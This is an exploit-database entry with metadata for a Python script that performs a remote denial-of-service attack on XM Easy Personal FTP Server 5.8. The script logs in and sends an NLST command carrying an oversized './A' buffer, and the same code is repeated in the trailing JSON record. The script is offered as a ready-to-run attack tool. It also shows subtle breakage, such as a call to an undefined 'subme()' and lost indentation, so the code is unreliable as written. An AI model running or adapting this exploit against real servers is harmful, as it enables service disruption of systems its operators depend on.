ID 1337DAY-ID-9554
Type zdt
Reporter Platen
Modified 2009-10-02T00:00:00
Description
Exploit for unknown platform in category remote exploits
============================
XM Easy Personal FTP 5.8 DoS
============================
# Title: XM Easy Personal FTP 5.8 DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PLATEN
# Published: 2009-10-02
# Verified: yes
view source
print?
#!/usr/bin/python
print "\n###############################################################"
print "## Iranian Pentesters Home ##"
print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##"
print "## http://www.dxm2008.com/data/ftpserversetup.exe ##"
print "## author: PLATEN ##"
print "############################################################### \n"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
subme()
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("nlst %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)
# 0day.today [2018-03-02] #
{"published": "2009-10-02T00:00:00", "id": "1337DAY-ID-9554", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category remote exploits", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-02T23:33:35", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-02T23:33:35", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-02T23:33:35", "edition": 2, "title": "XM Easy Personal FTP 5.8 DoS", "href": "https://0day.today/exploit/description/9554", "modified": "2009-10-02T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/9554", "references": [], "reporter": "Platen", "sourceData": "============================\r\nXM Easy Personal FTP 5.8 DoS\r\n============================\r\n\r\n\r\n# Title: XM Easy Personal FTP 5.8 DoS\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: PLATEN\r\n# Published: 2009-10-02\r\n# Verified: yes\r\n\r\n\r\nview source\r\nprint?\r\n#!/usr/bin/python\r\nprint \"\\n###############################################################\"\r\nprint \"## Iranian Pentesters Home ##\"\r\nprint \"## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##\"\r\nprint \"## http://www.dxm2008.com/data/ftpserversetup.exe ##\"\r\nprint \"## author: PLATEN ##\"\r\nprint \"############################################################### \\n\"\r\nimport socket\r\nimport sys\r\n \r\ndef Usage():\r\n print (\"Usage: ./expl.py <host> <Username> <password>\\n\")\r\nbuffer= \"./A\" * 6300\r\nsubme()\r\ndef start(hostname, username, passwd):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((hostname, 21))\r\n except:\r\n print (\"[-] Connection error!\")\r\n sys.exit(1)\r\n r=sock.recv(1024)\r\n print \"[+] \" + r\r\n sock.send(\"user %s\\r\\n\" %username)\r\n r=sock.recv(1024)\r\n sock.send(\"pass %s\\r\\n\" %passwd)\r\n r=sock.recv(1024)\r\n print \"[+] Send evil string\"\r\n sock.send(\"nlst %s\\r\\n\" %buffer)\r\n sock.close()\r\n \r\nif len(sys.argv) <> 4:\r\n Usage()\r\n sys.exit(1)\r\nelse:\r\n hostname=sys.argv[1]\r\n username=sys.argv[2]\r\n passwd=sys.argv[3]\r\n start(hostname,username,passwd)\r\n sys.exit(0)\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "immutableFields": []}
{}